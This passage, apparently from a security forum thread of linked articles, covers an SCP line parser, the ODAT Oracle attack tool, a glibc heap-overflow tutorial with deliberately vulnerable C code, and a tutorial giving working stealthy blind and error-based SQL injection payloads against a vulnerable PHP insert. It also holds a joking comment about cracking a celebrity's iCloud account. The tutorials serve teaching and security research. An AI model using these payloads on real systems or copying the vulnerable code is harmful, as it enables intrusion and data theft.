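    if (errno == ERANGE || *end != '\0')
        return -1;

    errno = 0;
    unsigned long m = strtoul(modebuf, &end, 8);
    if (errno == ERANGE || *end != '\0' || m > 07777)
        return -1;
    out->mode = (unsigned int)m;
    return 0;
}

/* Constructed sample: a hostile sink line whose size field is ndigits long. */
const char *scp_sample_line(size_t ndigits)
{
    static char buf[512];
    size_t n;
    if (ndigits > 400)
        ndigits = 400;
    n = (size_t)snprintf(buf, sizeof buf, "C0644 ");
    memset(buf + n, '9', ndigits);
    n += ndigits;
    snprintf(buf + n, sizeof buf - n, " evil.bin\n");
    return buf;
}

int main(void)
{
    struct scp_sink s;
    const char *lines[] = { "C0644 1234 file.txt\n", scp_sample_line(200) };
    for (size_t i = 0; i < 2; i++) {
        if (scp_parse_sink_line(lines[i], &s) == 0)
            printf("ok: mode=%o size=%llu name=%s\n", s.mode, s.size, s.name);
        else
            printf("rejected: %.40s...\n", lines[i]);
    }
    return 0;
}
```

Running it parses the well-formed line and rejects the one with a 200-digit size field, which is exactly the input a malicious server would send to an unchecked client.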
  17. Ransomware Tracker https://ransomwaretracker.abuse.ch/
18. ODAT

ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely.

Usage examples of ODAT:
- You have an Oracle database listening remotely and want to find valid SIDs and credentials in order to connect to the database
- You have a valid Oracle account on a database and want to escalate your privileges to become DBA or SYSDBA
- You have an Oracle account and you want to execute system commands (e.g. a reverse shell) in order to move forward on the operating system hosting the database

Tested on Oracle Database 10g, 11g and 12c (12.1.0.2.0).

Link: https://github.com/quentinhardy/odat
19. Understanding the Heap & Exploiting Heap Overflows

This post will begin with a high-level description of the heap and slowly builds up until you are able to write your own heap-based exploits. We assume we have non-root access to a computer but are able to run the following program as root (meaning it's a setuid binary):

#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>   /* read() */

int main(int argc, char *argv[])
{
    char *buf1 = malloc(128);
    char *buf2 = malloc(256);

    /* deliberate bug: up to 200 bytes are read into a 128-byte buffer */
    read(fileno(stdin), buf1, 200);

    free(buf2);
    free(buf1);
    return 0;
}

There's a blatant buffer overflow in the read() call, which we will be exploiting. First we need to know how the heap is managed (we focus on Linux).

Basic Heap and Chunk Layout

Every memory allocation a program makes (say by calling malloc) is internally represented by a so-called "chunk". A chunk consists of metadata and the memory returned to the program (i.e., the memory actually returned by malloc). All these chunks are saved on the heap, which is a memory region capable of expanding when new memory is requested. Similarly, the heap can shrink once a certain amount of memory has been freed. A chunk is defined in the glibc source (malloc/malloc.c) as follows:

struct malloc_chunk {
    INTERNAL_SIZE_T      prev_size;   /* Size of previous chunk (if free). */
    INTERNAL_SIZE_T      size;        /* Size in bytes, including overhead. */
    struct malloc_chunk* fd;          /* double links -- used only if free. */
    struct malloc_chunk* bk;
    /* Only used for large blocks: pointer to next larger size. */
    struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
    struct malloc_chunk* bk_nextsize;
};

Assuming no memory chunks have been freed yet, new memory allocations are always stored right after the last allocated chunk. So if a program were to call malloc(256), malloc(512), and finally malloc(1024), the memory layout of the heap is as follows:

Meta-data of chunk created by malloc(256)
The 256 bytes of memory returned by malloc
-----------------------------------------
Meta-data of chunk created by malloc(512)
The 512 bytes of memory returned by malloc
-----------------------------------------
Meta-data of chunk created by malloc(1024)
The 1024 bytes of memory returned by malloc
-----------------------------------------
Meta-data of the top chunk

The dashed line "---" is an imaginary boundary between the chunks; in reality they are placed right next to each other (the original post links an example program illustrating the layout). Anyway, you're probably wondering why I included the metadata of the "top chunk" in the layout. Well, the top chunk represents the remaining available memory on the heap, and it is the only chunk that can grow in size. When a new memory request is made, the top chunk is split into two: the first part becomes the requested chunk, and the second part is the new top chunk (so the top chunk shrank in size). If the top chunk is not large enough to fulfill the memory allocation, the program asks the operating system to expand the top chunk (making the heap grow in size).

Full article: http://www.mathyvanhoef.com/2013/02/understanding-heap-exploiting-heap.html
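An added example, not from the original post, that inspects chunk headers on a live glibc heap instead of drawing them: it computes the chunk size glibc reserves for a request (256 becomes 272 on 64-bit because of the size word and 16-byte alignment), checks that the three allocations from the diagram are laid end to end, locates the top chunk after the last one, and repeats the post's overflow to show that writing 200 bytes into the 128-byte request lands on the next chunk's size field. It assumes glibc's ptmalloc layout (size word directly before the returned pointer, low three bits used as flags); another allocator will give different numbers. Nothing is freed on purpose, because free() on a chunk with a clobbered header aborts.

```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

/* Assumes glibc ptmalloc: an 8-byte (on 64-bit) size field sits right before
 * the pointer malloc returns, and its low three bits are flags. */
#define SIZE_SZ        (sizeof(size_t))
#define MALLOC_ALIGN   (2 * SIZE_SZ)
#define MIN_CHUNK_SIZE (4 * SIZE_SZ)

/* glibc's request2size(): user request -> chunk size including the header,
 * rounded up to MALLOC_ALIGN. malloc(256) therefore owns a 272-byte chunk. */
size_t request_to_chunk_size(size_t req)
{
    size_t sz = (req + SIZE_SZ + MALLOC_ALIGN - 1) & ~(MALLOC_ALIGN - 1);
    return sz < MIN_CHUNK_SIZE ? MIN_CHUNK_SIZE : sz;
}

/* The size field is one word before the pointer malloc returned. */
size_t chunk_size(const void *mem)
{
    return ((const size_t *)mem)[-1] & ~(size_t)7;
}

/* Flag bits: PREV_INUSE (1), IS_MMAPPED (2), NON_MAIN_ARENA (4). */
size_t chunk_flags(const void *mem)
{
    return ((const size_t *)mem)[-1] & 7;
}

/* Allocate 256/512/1024 as in the diagram and count how many of the chunks
 * start exactly where the previous one's size field says it ends.
 * Returns 2 when the heap looks like the drawing. Allocations are leaked. */
int adjacent_chunks(void)
{
    char *a = malloc(256), *b = malloc(512), *c = malloc(1024);
    int adjacent = 0;
    if (!a || !b || !c)
        return -1;
    if ((uintptr_t)b - (uintptr_t)a == chunk_size(a)) adjacent++;
    if ((uintptr_t)c - (uintptr_t)b == chunk_size(b)) adjacent++;
    return adjacent;
}

/* The chunk after the most recent allocation is the top chunk, and its header
 * is addressable the same way. Returns its PREV_INUSE bit, which glibc keeps
 * set on the top chunk. */
size_t top_chunk_prev_inuse(void)
{
    char *c = malloc(1024);
    if (!c)
        return 0;
    char *top_mem = c + chunk_size(c);   /* where the top chunk's "user data" would start */
    return chunk_flags(top_mem) & 1;
}

/* The post's bug: 200 bytes written into a 128-byte request. That request
 * owns a 144-byte chunk with 136 usable bytes, so bytes 136..143 overwrite the
 * next chunk's size field and 144..199 spill into buf2's own data (its fd/bk
 * once it is freed). Returns 1 if buf2's size field changed, -1 if the two
 * chunks were not adjacent (in which case nothing is written). */
int overflow_clobbers_header(void)
{
    char *buf1 = malloc(128), *buf2 = malloc(256);
    if (!buf1 || !buf2 || (uintptr_t)buf2 - (uintptr_t)buf1 != chunk_size(buf1))
        return -1;
    size_t before = chunk_size(buf2);
    volatile size_t n = 200;             /* length kept opaque so fortify/constant folding stay out */
    for (size_t i = 0; i < n; i++)
        buf1[i] = 'A';
    return chunk_size(buf2) != before;   /* header now reads 0x4141414141414140 */
}

int main(void)
{
    printf("malloc(256) -> chunk of %zu bytes\n", request_to_chunk_size(256));
    printf("adjacent chunk pairs: %d\n", adjacent_chunks());
    printf("top chunk PREV_INUSE: %zu\n", top_chunk_prev_inuse());
    printf("overflow clobbered buf2's header: %d\n", overflow_clobbers_header());
    return 0;
}
```

The last check is the whole point of the post: the bytes that spill past buf1 are not "lost", they become buf2's metadata, which free() will later trust.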
20. Windows Filtering Platform: Persistent state under the hood

Fri 04 March 2016
By Damien Aumaitre and Alexandre Gazet

Since Windows XP SP2, the Windows firewall is deployed and enabled by default in every Microsoft Windows operating system. The firewall relies on a set of APIs and services called the Windows Filtering Platform (WFP). Although used by almost every Windows OS, WFP is still one of the relatively unknown beasts that lie in the kernel. In this post we will see how the firewall manages its persistent state.

Disclaimer: this post was written a year ago with Alexandre Gazet, a former colleague. After gathering dust for too long we decided to publish it anyway. All experiments were conducted on a Microsoft Windows 8.1 operating system.

Introduction

The registry is full of unknown binary blobs. Not so long ago, we stumbled upon the registry sub-key of the BFE service. In the screenshot (not reproduced here) we see a bunch of entries with a name that looks like a GUID and some binary data. So what is this BFE thingy? A quick search on Google points us in the right direction: BFE stands for Base Filtering Engine, which is a core part of the Windows Filtering Platform (WFP).

Since Windows XP SP2, the Windows firewall is deployed and enabled by default in every Microsoft Windows operating system. The firewall relies on a set of APIs and services called the Windows Filtering Platform (WFP). Although used by almost every Windows OS, WFP is still one of the relatively unknown beasts that lie in the kernel.

The WFP architecture is well explained on the MSDN (http://msdn.microsoft.com/en-us/library/windows/desktop/aa366509(v=vs.85).aspx). Amongst the points of high interest we can mention two components: the user-mode Base Filtering Engine (BFE, located in bfe.dll) and its kernel-mode counterpart, the KM Filter Engine (KMFE, located in netio.sys). WFP can be used by third parties to develop advanced filtering or routing solutions (implementing a VPN solution comes to mind). However, this is also the core of the well-known Windows firewall, which comes by default with a set of pre-configured rules.

For now let's just say that a filter is a rule that governs classification. It defines a set of conditions which, when met, trigger an action (e.g. a callout). A filter operates at a certain layer, e.g. FWPM_LAYER_OUTBOUND_TRANSPORT_V4_DISCARD. Rules are grouped into providers that define "logical features" (for example: Microsoft Windows WFP Built-in TCP Templates provider or Windows Firewall IPsec Provider).

Our objective is to discover how the OS interacts with the WFP and how the configuration is persistently stored in binary format. With this premise in mind, we'll start by examining the WFP objects' lifetime. A quick look at the documentation tells us that WFP objects can have one of four possible lifetimes:

Dynamic: An object is dynamic only if it is added using a dynamic session handle. Dynamic objects live until they are deleted or the owning session terminates.
Static: Objects are static by default. Static objects live until they are deleted, BFE stops, or the system is shut down.
Persistent: Persistent objects are created by passing the appropriate FWPM_*_FLAG_PERSISTENT flag to an Fwpm*Add0 function. Persistent objects live until they are deleted.
Built-in: Built-in objects are predefined by BFE and cannot be added or deleted. They live forever.

Kernel-mode filters can be marked as boot-time filters by passing the appropriate flag to the FwpmFilterAdd0 function. Boot-time filters are added to the system when the TCP/IP driver starts, and removed when BFE finishes initialization.

So how are these persistent objects managed? It's time to do a bit of reversing.

Full article: http://blog.quarkslab.com/windows-filtering-platform-persistent-state-under-the-hood.html
21. Exploiting 'INSERT INTO' SQL Injections Ninja Style

In the deep hours of the night you stumble upon a form where you are asked for, among other things, your nickname. You enter a single quote ' as your name and you get an error message saying: "You have an error in your SQL syntax". With high probability the SQL injection is taking place in an INSERT statement. Now, you could simply start sqlmap and let it try to do the dirty work. But there's a disadvantage: an automated tool will probably send some requests where the INSERT statement succeeds. This will create strange entries in the database. We must avoid this to remain stealthy. Let's create a similar situation locally and demonstrate this. Our test code is:

<?php
$con = mysql_connect("localhost", "root", "toor") or die(mysql_error($con));
mysql_select_db("testdb", $con) or die(mysql_error($con));
$var = $_POST['post'];
/* deliberately vulnerable: user input is interpolated straight into the query */
mysql_query("INSERT INTO data VALUES ('one', '$var')") or die(mysql_error($con));
mysql_close($con) or die(mysql_error($con));
echo "The values have been added!\n";
?>

Normally a good programmer will write better code than that, but it's just an example and will suffice to demonstrate the exploit. We run sqlmap against this using the command

    ./sqlmap.py -u "http://localhost/test.php" --data "post=ValidValue" -v 3

The (partly redacted) output of the command can be seen on pastebin. It found an error-based SQL injection. We will return to this result at the end of the post. For now we will ignore the error-based SQL injection and only notice that unwanted new database entries have been added by using sqlmap.

Avoiding unwanted inserts

We must find a query that is syntactically correct yet contains a semantic error. Moreover the semantic error should only be detectable by executing the query. I immediately thought of scalar subqueries. These are subqueries that must return only a single row, otherwise an error is thrown. As quoted from the MySQL manual:

In its simplest form, a scalar subquery is a subquery that returns a single value. A scalar subquery is a simple operand, and you can use it almost anywhere a single column value or literal is legal, and you can expect it to have those characteristics that all operands have: a data type, a length, an indication that it can be NULL, and so on.

An artificial example is:

    SELECT (SELECT name FROM users WHERE email = 'bobby@tables.com')

If the subquery is empty it's converted to the value NULL. Now, if email is a primary key then at most one name will be returned. If email isn't a primary key it depends on the contents of the database. This proves that we must first execute the subquery and only then will we know if it's really a scalar subquery or not! Another variation where the subquery must be scalar is:

    SELECT 'Your name is: ' || (SELECT name FROM users WHERE email = 'bobby@tables.com')

Here || is used as string concatenation. (Caveat: in MySQL, || is the logical OR operator unless the PIPES_AS_CONCAT SQL mode is enabled. The payloads below work either way, because the subquery is evaluated as an operand in both cases and that evaluation is what raises the error.) The following query will always return the error "#1242 - Subquery returns more than 1 row" (tested with MySQL):

    SELECT (SELECT nameIt FROM ((SELECT 'value1' AS nameIt) UNION (SELECT 'value2' AS nameIt)) TEST)

Alright, so we have a query that is executed yet returns an error. This prevents the original INSERT INTO command from being executed, yet our own SQL code will be executed. I will now show how to turn this into a usable blind SQL injection. We will create different behavior/results based on a boolean condition. We can follow two strategies to achieve this. The first is to find another semantic error and output a different error based on the boolean condition. The second strategy is to use a timing attack: if the condition is true the query will complete instantly, otherwise it takes a longer time. The timing attack is the easier one to create. Consider the following SQL statement, where we replaced the nameIt column of the previous SQL statement with a more advanced expression:

    SELECT (SELECT CASE WHEN <condition> THEN SLEEP(3) ELSE 'anyValue' END FROM ((SELECT 'value1' AS nameIt) UNION (SELECT 'value2' AS nameIt)) TEST)

If <condition> is true the server will sleep for 3 seconds and then throw an error that the subquery returned more than one result. Otherwise, if <condition> is false, it will instantly throw the error. All that is left to do is to measure the time it takes for the server to answer the query so we know whether the condition was true or not. We can use automated tools that perform the timing attack based on this foundation.

Let's return to our example PHP code. What do we need to set our argument called post to in order to launch the attack? Try figuring it out yourself first. This is something you must learn to do on your own, especially since you are given the source code. Sending the following will do the trick:

    ' || (SELECT CASE WHEN <condition> THEN SLEEP(3) ELSE 'anyValue' END FROM ((SELECT 'value1' AS nameIt) UNION (SELECT 'value2' AS nameIt)) TEST) || '

This will expand to:

    INSERT INTO data VALUES ('one', '' || (SELECT CASE WHEN <condition> THEN SLEEP(3) ELSE 'anyValue' END FROM ((SELECT 'value1' AS nameIt) UNION (SELECT 'value2' AS nameIt)) TEST) || '')

Which is valid SQL syntax!

Speeding up the attack

This is all good and well, but because it's a time-based attack it can take an extremely long time to execute. We focus on the other strategy, where we trigger different errors based on the boolean condition. First we need to find another error that we can trigger based on a boolean condition. Sounds fairly straightforward, but it turns out generating an error is easy, yet finding errors that are generated whilst executing the query and controllable by a boolean condition can be quite hard. After more than an hour of messing around with some SQL statements and reading the MySQL documentation I finally found something usable! I got the following SQL statement:

    SELECT 'canBeAnyValue' REGEXP (SELECT CASE WHEN <condition> THEN '.*' ELSE '*' END)

Here the construct 'value' REGEXP 'regexp' is a boolean condition that is true when value matches the regular expression regexp and is false otherwise. Note that '.*' is a valid regular expression and '*' is not. So when <condition> is true the regular expression will simply be evaluated. When it's false an invalid regular expression is detected and MySQL will return the error "#1139 - Got error 'repetition-operator operand invalid' from regexp". Excellent! We can now create a boolean-based blind SQL injection where the subquery error is returned if the condition is true, and the regular expression error is returned when the condition is false.

But there's a snag: one must be careful with the REGEXP error. Say you modify the time-based SQL attack statement to the following:

    SELECT (SELECT CASE WHEN <condition> THEN 'anyValue' REGEXP '*' ELSE 'AnyValue' END FROM ((SELECT 'value1' AS nameIt) UNION (SELECT 'value2' AS nameIt)) TEST)

You reason as follows: if <condition> is false it will return 'AnyValue' twice and then throw an error that the subquery returned more than one result. If <condition> is true it tries to evaluate 'anyValue' REGEXP '*' and throws the regular expression error. But this is not what will happen! With this line you will always end up with the regular expression error. Why? Because MySQL knows that 'anyValue' REGEXP '*' is a constant expression and doesn't depend on anything. Therefore it will optimize the query and calculate this value in advance. So even though <condition> is false it still attempts to evaluate the regular expression during the optimization step. This always fails, and hence the regular expression error is always returned. The trick is to put the '*' and '.*' in a separate SELECT CASE WHEN .. END control flow so it won't be optimized. We conclude our story with the following SQL statement against our example code:

    ' || (SELECT 'thisCanBeAnyValue' REGEXP (SELECT CASE WHEN <condition> THEN '.*' ELSE '*' END) FROM ((SELECT 'value1' AS nameIt) UNION (SELECT 'value2' AS nameIt)) TEST) || '

When the condition is false the regular expression error will be returned, and when the condition is true the subquery error will be returned. All this happens without the actual INSERT statement being successfully executed even once. Hence the website administrator will notice no weird entries in his database. And last but not least, this attack is faster compared to the earlier time-based attack. Beautiful!

Even better: Error-based SQL injection

The previous methods were ideas I found myself. However the website is returning an error message, and there is a known error-based SQL injection technique that can return database entries in the error message. This is the type of attack that sqlmap also returned. With an error-based SQL injection we can greatly speed up the attack. The technique is based on the following query:

    SELECT COUNT(*), CONCAT(' We can put any scalar subquery here ', FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x

When we execute this command I get the message "ERROR 1062 (23000): Duplicate entry 'We can put any scalar subquery here' for key 'group_key'". As you can see the original input string is returned in the error message! In fact we can put any value we want there, including scalar subqueries. Let's first investigate why this error is returned. In the MySQL documentation we first notice: "You cannot use a column with RAND() values in an ORDER BY clause, because ORDER BY would evaluate the column multiple times". RAND() will also be evaluated multiple times in a GROUP BY clause. Each time RAND() is evaluated it will return a new result. Okay, so according to the documentation we're actually not allowed to use the function RAND() like this. Why? Because the function returns a new value each time it's evaluated, yet MySQL expects a function to always return the same value. This can cause strange error messages like the one we just got.

(Image captions from the original post: "One possible description of an Advanced Persistent Threat." and "... people smarter than me found the 'non-blind' error-based attack ...")

Nevertheless the error message contains a user-controllable string! Meaning we can let it return any database entry we want, which greatly speeds up the attack. But perhaps you're still wondering why this particular query fails. Well, answering that question means knowing exactly how the DBMS executes the query. Investigating this is way out of scope for this post. Just remember that in our query the problem is caused because the RAND() function is internally re-evaluated and will return a different value, which is something the DBMS is not expecting. Let's put this in our example code again. Something like the following will suffice:

    ' || (SELECT 'temp' FROM (SELECT COUNT(*), CONCAT(( subquery returning the value we want to retrieve ), FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) FromTable) || '

Et voila, we have a very fast SQL injection. Depending on the tables we can access, this example might need to be modified in order to work properly. In particular we can also include one of the previous SQL injections that always generate an error. This way we will be sure data is never inserted. After all, we are relying on undefined behavior which causes the error to show up. Who knows if there exists another DBMS that handles these queries with RAND() in them differently and they don't produce an error.

As a last note, being stealthy is always a relative notion. In some cases SQL errors could be logged and an administrator could be notified when they happen. In such a situation this attack wouldn't be stealthy at all!

Follow me on twitter @vanhoefm

Addendum: For Oracle 8, 9 and 10g databases the function utl_inaddr.get_host_name can be used to launch an error-based SQL injection. For Oracle 11g ctxsys.drithsx.sn and other functions can be used. [Source1] [Source2]

Posted by Mathy at 10:45

Source: http://www.mathyvanhoef.com/2011/10/exploiting-insert-into-sql-injections.html
22. I haven't read it, but it seems related to the subject: https://cryptome.org/2015/06/guccifer-letter-01.htm
23. He could have done something more useful, like "cracking" Emma Watson's iCloud account. Is he the one who started "The Fappening" with Jennifer Lawrence and the rest?
24. Competence or fraud?

Cristian Șerban
Application Security @Betfair
PROGRAMMING

Ten years ago, at the university where I was a student, a small security conference was organized. To make it more interesting, the organizers also created a registration page that was to open for sign-ups at 12 o'clock on a given date. I was passionate about the field and wanted to attend. I wanted to register among the first to secure my spot, especially since they had promised a T-shirt to the first 20 participants who signed up. At the time I was working as a full-time programmer and had already accumulated some hours in the technology used to build the registration page. So it didn't take me long to discover a vulnerability and manage to exploit it in time. I managed to register a little before the official time. The next day I showed up at the conference entrance, greeted politely, gave my name, and the colleague looked me up on the list and found me fairly easily. I peeked a little: I was first, 11:58. Perfect. Slightly surprised, he said: "Ah, you're the one, how did you do it?". When I asked whether I would get a T-shirt, he said no, but that I would get something better. During the conference he announced it publicly and handed me as a prize the book "Writing Secure Code" by Michael Howard and David LeBlanc.

Full article: http://www.todaysoftmag.ro/article/1250/competenta-sau-frauda

I think it's useful as guidance.